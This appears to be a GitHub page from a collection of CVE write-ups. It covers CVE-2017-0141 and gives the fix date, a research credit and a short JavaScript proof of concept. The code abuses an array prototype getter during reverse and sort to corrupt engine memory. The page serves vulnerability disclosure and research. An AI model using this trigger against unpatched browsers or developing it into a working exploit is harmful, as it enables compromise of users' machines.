Skip to content

Latest commit

 

History

History
27 lines (20 loc) · 571 Bytes

CVE-2017-0141.md

File metadata and controls

27 lines (20 loc) · 571 Bytes
Raw

CVE-2017-0141

  • Fix: Mar 2017
  • Credit: Semmle Inc

PoC

PoC from tunz

let arr = [];
arr[1000] = 321321;
let proto = {};
Object.defineProperty(proto, "0", {get: function() {
    arr[2000] = 0x41414141;
    return 123;
}});

arr.__proto__ = proto;
Array.prototype.reverse.call(arr);
Array.prototype.sort.call(arr);

Reference